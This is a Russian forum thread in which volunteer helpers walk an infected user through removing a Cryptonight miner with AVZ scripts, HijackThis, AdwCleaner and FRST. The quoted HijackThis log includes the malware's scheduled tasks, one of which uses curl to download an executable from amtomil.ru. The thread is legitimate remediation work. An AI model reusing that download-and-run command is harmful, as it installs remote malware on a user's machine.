• Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.

Решена JS:Cryptonight[Trj] Помогите, пожалуйста!

zo_rick

Новый пользователь
Сообщения
10
Симпатии
0
#1
Здравствуйте! Где-то неделю назад мой компьютер стал прилично притормаживать, ЦП нагружается до 50%, память на диске С стремительно исчезает. Не нашел никаких папок Cryptonight(может плохо искал). Антивирус AVG ничего не увидел, установил Avast сразу начал выдавать предупреждение о данном вирусе JS:Cryptonight[Trj], но ничего с ним сделать не может. При каждой перезагрузке забивается память. Вчера выключил компьютер с 50Гб на С, сегодня включаю уже 27Гб. До создания логов на AVZ я удалил Google Chrome, но корневые папки оставил. нужно ли мне устанавливать Хром и сканировать заново? Помогите, пожалуйста, а то скоро без лаптопа останусь.
 

Вложения

Кирилл

Команда форума
Администратор
Сообщения
13,379
Симпатии
5,899
#2
Здравствуйте!
Программа Tencent Gaming Buddy - сами установили?

Настройки DNS ваши?
Код:
178.132.6.57
193.238.153.54
35.177.46.238
46.101.28.31
82.202.226.203
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
QuarantineFile('C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\app.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\ml.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe', '');
DeleteFile('C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe', '64');
DeleteFile('C:\WINDOWS\system32\Tasks\{704B1058-6981-4DFF-B521-E0E3DEA27878}', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\curl', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\curls', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\CurrencyConvertor', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\CurrencyConvertor2', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\cyyMvLzPGa', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\Scheduled Update S-1-8-22', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\setupsk', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\setupsk_upd', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\xWwMI', 'x64');
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "cyyMvLzPGa" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Scheduled Update S-1-8-22" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "setupsk" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "setupsk_upd" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "xWwMI" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor2" /F', 0, 15000, true);
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

Код:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} [SuggestionsURLFallback] = http://clients5.google.com/complete/search?q={searchTerms}&hl={language}&gl={language}&client=ie8&mw={ie:maxWidth}&sh={ie:sectionHeight}&rh={ie:rowHeight}&inputencoding={inputEncoding}&outputencoding={outputEncoding} - Google
O2 - HKLM\..\BHO: (no name) - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: (disabled) Scheduled Update S-1-8-22 - C:\WINDOWS\explorer.exe http://rokomi.ru
O22 - Task: CurrencyConvertor - C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\ml.py" --APPNAME="CurrencyConvertor" (file missing)
O22 - Task: CurrencyConvertor2 - C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\app.py" (file missing)
O22 - Task: curl - C:\Users\Zo_rick\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe
O22 - Task: curls - C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task: cyyMvLzPGa - C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat (file missing)
O22 - Task: setupsk - C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py" --APPNAME="setupsk" (file missing)
O22 - Task: setupsk_upd - C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py" --APPNAME="setupsk_upd" (file missing)
O22 - Task: xWwMI - C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat (file missing)
  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[S1].txt.
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.
 
Последнее редактирование:

zo_rick

Новый пользователь
Сообщения
10
Симпатии
0
#3
DNS мои.
Программу tencent gaming buddy сам скачивал.
отключил антивирус, прогнал скрипт, прошло удачно пишет, но комп не перезагрузился. продолжить второй скрипт?

UPD: Решил сам перезагрузить
 
Последнее редактирование:

Кирилл

Команда форума
Администратор
Сообщения
13,379
Симпатии
5,899
#4
Поправил скрипт, давайте заново.
 

zo_rick

Новый пользователь
Сообщения
10
Симпатии
0
#5
Отправил файл quarantine.zip

UPD: B HijackThis смог пофиксить только первые 3 строки.

R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} [SuggestionsURLFallback] = http://clients5.google.com/complete/search?...
O2 - HKLM\..\BHO: (no name) - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)

UPD2: AdwCleaner
 

Вложения

Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
15,105
Симпатии
12,362
#6
- Удалите в AdwCleaner всё кроме папок от mail.ru - если программами от mail.ru не пользуетесь, то их тоже удалите. Отчет после удаления прикрепите.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

akok

Команда форума
Администратор
Сообщения
15,105
Симпатии
12,362
#8
Лог удаления ADW имеет префикс "С", а не "S"
Killer Control Center - используете?
Tencent Gaming Buddy - используете?
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    VirusTotal: C:\Program Files (x86)\SCM\SCM.exe
    GroupPolicy: Restriction ? <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    2017-12-06 22:55 - 2017-09-29 16:42 - 000000070 _____ () C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA
    2017-12-06 22:55 - 2017-09-29 16:42 - 000000072 _____ () C:\Users\Zo_rick\AppData\Local\vymftvIiGM
    2017-12-06 22:55 - 2017-12-06 22:55 - 000000001 _____ () C:\Users\Zo_rick\AppData\Local\WMI.ini
    2017-12-06 22:55 - 2017-09-29 16:42 - 000001202 _____ () C:\Users\Zo_rick\AppData\Local\WQmMNCWmk
    2017-09-29 16:42 - 2017-09-29 16:42 - 000001202 _____ () C:\Users\Zo_rick\AppData\Local\WQmMNCWmk.bat
    2017-12-06 22:55 - 2017-09-29 16:42 - 000001198 _____ () C:\Users\Zo_rick\AppData\Local\gUnfaSrsnCv
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
    Task: {A7194199-4471-4E71-975F-96481AD14A85} - \{704B1058-6981-4DFF-B521-E0E3DEA27878} -> No File <==== ATTENTION
    AlternateDataStreams: C:\ProgramData\PACE:3B3F2425358D33BE [217]
    AlternateDataStreams: C:\Users\Все пользователи\PACE:3B3F2425358D33BE [217]
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 

zo_rick

Новый пользователь
Сообщения
10
Симпатии
0
#9
Killer Control Center это предустановленная программа. шла вместе со всем софтом. Также другие подозрительные программы как Dragon Center, Burn recovery, Nahimic, SCM тоже были предустановлены. Ноутбук MSI GS63VR 7RF Stealth Pro. Программы используются.
tencet gaming buddy использую, но в принципе могу удалить.
AdwCleaner log C
FRST fixlog

UPD: нагрузка ЦП уменьшилась, но изредка прыгает до 80-100%, также пространство на диске С осталось небольшим.
Сообщения объединены:

нет, все-таки частенько нагружается цп до 80
 

Вложения

Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
15,105
Симпатии
12,362
#10
Сделайте свежий лог автологера, проверю систему еще раз.
 

zo_rick

Новый пользователь
Сообщения
10
Симпатии
0
#15
Интересная ситуация, он начинает нагружаться, когда я сворачиваю и не открываю диспетчер задач. как только открываю и смотрю активность, так сразу нагрузка падает до 2-15%. Поэтому зафиксировать этот процесс не удается.
Хотя сейчас вроде бы все хорошо. долго уже не нагружается. Еще буду мониторить.
Скажите, как мне найти файлы, которые "съели" мою память на диске С, а то мне страшно искать в системных файлах. Можете с этим помочь?)
 

Sandor

Ассоциация VN/VIP
Сообщения
4,415
Симпатии
1,572
#16
С этим Вам помогут в системном разделе форума. Тут в завершение:

Подготовьте лог SecurityCheck by glax24

Ознакомьтесь: Рекомендации после лечения

Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
  1. Запустите AVZ.
  2. Выполните обновление баз (Меню Файл - Обновление баз)
  3. Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  4. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  5. Закачайте полученный архив, как описано на этой странице.
  6. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.
 

zo_rick

Новый пользователь
Сообщения
10
Симпатии
0
#17
Спасибо Вам за помощь! ЦП достаточно долгое время не нагружается.
SecurityCheck сделал, а вот обновить базы в AVZ не смог, поэтому не решил делать дальше. В меню надпись обновление баз не является активным, не могу нажать.
 

Вложения

Кирилл

Команда форума
Администратор
Сообщения
13,379
Симпатии
5,899
#18
Устраните:

Запрос на повышение прав для администраторов отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^

Отключен общий профиль Брандмауэра Windows
Отключен частный профиль Брандмауэра Windows


WinRAR 5.40 (64-разрядная) v.5.40.0 Внимание! Скачать обновления

Java SE Development Kit 8 Update 131 (64-bit) v.8.0.1310.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jdk-8u172-windows-x64.exe)^
Java SE Development Kit 8 Update 131 v.8.0.1310.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jdk-8u172-windows-i586.exe)^
QuickTime 7 v.7.79.80.95 Данная программа больше не поддерживается разработчиком и имеет известные проблемы безопасности! Рекомендуется деинсталлировать данное ПО.

Mozilla Firefox 59.0.2 (x64 ru) v.59.0.2 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
Yandex v.18.3.1.1232 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
Opera Stable 52.0.2871.99 v.52.0.2871.99 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^

Удачи.
 

akok

Команда форума
Администратор
Сообщения
15,105
Симпатии
12,362
#19
В меню надпись обновление баз не является активным, не могу нажать.
Сейчас тестируем новую версию автологера с новой версией AVZ на борту. Сейчас базы не обновляются.
 
Сверху Снизу